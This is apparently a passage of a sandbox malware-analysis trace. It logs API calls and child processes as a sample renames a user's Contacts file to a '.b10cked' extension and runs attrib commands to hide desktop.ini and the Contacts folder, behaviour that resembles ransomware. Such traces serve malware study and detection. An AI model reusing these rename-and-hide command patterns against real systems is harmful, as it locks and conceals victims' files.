(_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0208.661] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0208.661] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0208.661] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0208.661] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0208.661] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0208.661] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0208.661] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0208.661] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0208.661] _wcsicmp (_String1="ADMINI~1.CON", _String2=".") returned 51 [0208.661] _wcsicmp (_String1="ADMINI~1.CON", _String2="..") returned 51 [0208.661] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Contacts\\ADMINI~1.CON" (normalized: "c:\\users\\default\\contacts\\admini~1.con")) returned 0x20 [0208.661] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1a1e38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0208.661] SetErrorMode (uMode=0x0) returned 0x0 [0208.661] SetErrorMode (uMode=0x1) returned 0x0 [0208.661] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Contacts\\ADMINI~1.CON", nBufferLength=0x104, lpBuffer=0x18eaec, lpFilePart=0x18ead4 | out: lpBuffer="C:\\Users\\Default\\Contacts\\ADMINI~1.CON", lpFilePart=0x18ead4*="ADMINI~1.CON") returned 0x26 [0208.661] SetErrorMode (uMode=0x0) returned 0x1 [0208.661] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Contacts" (normalized: "c:\\users\\default\\contacts")) returned 0x11 [0208.662] _wcsicmp (_String1="ADMINI~1.CON", _String2=".") returned 51 [0208.662] _wcsicmp (_String1="ADMINI~1.CON", _String2="..") returned 51 [0208.662] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Contacts\\ADMINI~1.CON" (normalized: "c:\\users\\default\\contacts\\admini~1.con")) returned 0x20 [0208.662] SetErrorMode (uMode=0x0) returned 0x0 [0208.662] SetErrorMode (uMode=0x1) returned 0x0 [0208.662] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Contacts\\ADMINI~1.CON", nBufferLength=0x104, lpBuffer=0x18ef68, lpFilePart=0x18ed00 | out: lpBuffer="C:\\Users\\Default\\Contacts\\ADMINI~1.CON", lpFilePart=0x18ed00*="ADMINI~1.CON") returned 0x26 [0208.662] SetErrorMode (uMode=0x0) returned 0x1 [0208.662] SetErrorMode (uMode=0x0) returned 0x0 [0208.662] SetErrorMode (uMode=0x1) returned 0x0 [0208.662] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Contacts\\Administrator.contact.b10cked", nBufferLength=0x104, lpBuffer=0x18f170, lpFilePart=0x18ed00 | out: lpBuffer="C:\\Users\\Default\\Contacts\\Administrator.contact.b10cked", lpFilePart=0x18ed00*="Administrator.contact.b10cked") returned 0x37 [0208.662] SetErrorMode (uMode=0x0) returned 0x1 [0208.662] SetLastError (dwErrCode=0x0) [0208.662] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Contacts\\Administrator.contact.b10cked" (normalized: "c:\\users\\default\\contacts\\administrator.contact.b10cked")) returned 0xffffffff [0208.662] GetLastError () returned 0x2 [0208.662] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\Contacts\\ADMINI~1.CON", fInfoLevelId=0x1, lpFindFileData=0x18e67c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18e67c) returned 0x190e58 [0208.662] FindNextFileW (in: hFindFile=0x190e58, lpFindFileData=0x18e67c | out: lpFindFileData=0x18e67c) returned 0 [0208.663] GetLastError () returned 0x12 [0208.663] FindClose (in: hFindFile=0x190e58 | out: hFindFile=0x190e58) returned 1 [0208.663] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\Contacts\\ADMINI~1.CON", fInfoLevelId=0x1, lpFindFileData=0x1a1bd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1a1bd8) returned 0x190e58 [0208.664] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Contacts\\Administrator.contact.b10cked", nBufferLength=0x104, lpBuffer=0x18e914, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Contacts\\Administrator.contact.b10cked", lpFilePart=0x0) returned 0x37 [0208.664] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Contacts\\Administrator.contact", nBufferLength=0x104, lpBuffer=0x18e914, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Contacts\\Administrator.contact", lpFilePart=0x0) returned 0x2f [0208.664] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Contacts\\Administrator.contact" (normalized: "c:\\users\\default\\contacts\\administrator.contact")) returned 0x20 [0208.664] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\Contacts\\Administrator.contact" (normalized: "c:\\users\\default\\contacts\\administrator.contact"), lpNewFileName="C:\\Users\\Default\\Contacts\\Administrator.contact.b10cked" (normalized: "c:\\users\\default\\contacts\\administrator.contact.b10cked"), dwFlags=0x3) returned 1 [0208.664] FindClose (in: hFindFile=0x190e58 | out: hFindFile=0x190e58) returned 1 [0208.664] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x18e8c8 | out: _Buffer=" 1") returned 9 [0208.664] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.664] GetFileType (hFile=0x7) returned 0x2 [0208.664] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0208.664] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18e854 | out: lpMode=0x18e854) returned 1 [0208.665] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.665] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18e888 | out: lpConsoleScreenBufferInfo=0x18e888) returned 1 [0209.158] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0209.159] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x18e8c8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0209.159] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x18e8ac, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x18e8ac*=0x1a) returned 1 [0209.159] _get_osfhandle (_FileHandle=1) returned 0x7 [0209.159] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0209.159] _get_osfhandle (_FileHandle=1) returned 0x7 [0209.159] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0209.159] _get_osfhandle (_FileHandle=0) returned 0x3 [0209.159] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0209.160] SetConsoleInputExeNameW () returned 0x1 [0209.160] GetConsoleOutputCP () returned 0x1b5 [0209.160] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0209.160] SetThreadUILanguage (LangId=0x0) returned 0x409 [0209.160] exit (_Code=0) Process: id = "509" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16e00" os_pid = "0x3a4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "507" os_parent_pid = "0x140" cmd_line = "attrib -r -s -h \"C:\\Users\\Default\\Contacts\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30877 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30878 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 30879 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 30880 start_va = 0x110000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 30881 start_va = 0x170000 end_va = 0x176fff entry_point = 0x170000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 30882 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30883 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 30884 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 30885 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 30886 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30887 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30888 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30889 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30890 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 30891 start_va = 0x4d0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 30892 start_va = 0x6dc20000 end_va = 0x6dc3cfff entry_point = 0x6dc20000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 30893 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30894 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 30895 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30896 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30897 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 30898 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30899 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30900 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30901 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 30902 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30903 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30904 start_va = 0x180000 end_va = 0x247fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 30905 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30906 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 710 os_tid = 0xf98 Process: id = "510" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16d40" os_pid = "0xfdc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "507" os_parent_pid = "0x140" cmd_line = "attrib +h \"C:\\Users\\Default\\Contacts\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30907 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30908 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 30909 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 30910 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 30911 start_va = 0xb10000 end_va = 0xb16fff entry_point = 0xb10000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 30912 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30913 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 30914 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 30915 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 30916 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30917 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30918 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30919 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30920 start_va = 0x130000 end_va = 0x13ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 30921 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 30922 start_va = 0x6dc00000 end_va = 0x6dc1cfff entry_point = 0x6dc00000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 30923 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30924 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 30925 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30926 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30927 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 30928 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30929 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30930 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30931 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 30932 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30933 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30934 start_va = 0x140000 end_va = 0x207fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 30935 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30936 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 711 os_tid = 0x6f0 Process: id = "511" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16d40" os_pid = "0x828" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "507" os_parent_pid = "0x140" cmd_line = "attrib +h \"C:\\Users\\Default\\Contacts\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30937 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30938 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 30939 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 30940 start_va = 0x160000 end_va = 0x166fff entry_point = 0x160000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 30941 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 30942 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30943 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 30944 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 30945 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 30946 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30947 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30948 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30949 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30950 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 30951 start_va = 0x3e0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 30952 start_va = 0x6dc20000 end_va = 0x6dc3cfff entry_point = 0x6dc20000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 30953 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30954 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 30955 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30956 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30957 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 30958 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30959 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30960 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30961 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 30962 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30963 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30964 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 30965 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30966 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: 